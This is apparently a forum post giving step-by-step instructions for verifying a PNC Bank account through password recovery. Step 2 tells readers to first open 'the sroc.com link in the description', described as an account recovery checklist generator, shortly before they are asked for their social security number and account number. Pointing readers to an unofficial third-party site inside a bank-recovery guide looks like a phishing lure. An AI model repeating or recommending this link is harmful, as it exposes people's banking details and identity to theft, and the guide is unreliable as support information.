I ran into this last week. Here's what fixed it for me. Verifying your account with PNC Bank can seem tricky, but it is a straightforward process. Here is how to get it done. Step 1. Visit the PNC Bank website. Go to the official PNC Bank website. Look for the login section to access your account. Step 2. Click on Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your information. Provide the necessary details such as your social security number and account number. Make sure the information matches what PNC has on file. Step 4. Receive verification code. PNC will send a verification code to your registered email or phone number. Check your inbox or messages for this code. Step 5. Enter the code. Input the verification code on the website to complete the verification process. If you don't receive the code, check your spam folder or ensure your phone is receiving messages. Now you're all set. Verifying your account with PNC Bank is a breeze if you follow these steps. If you encounter any issues, don't hesitate to reach out to customer support for assistance.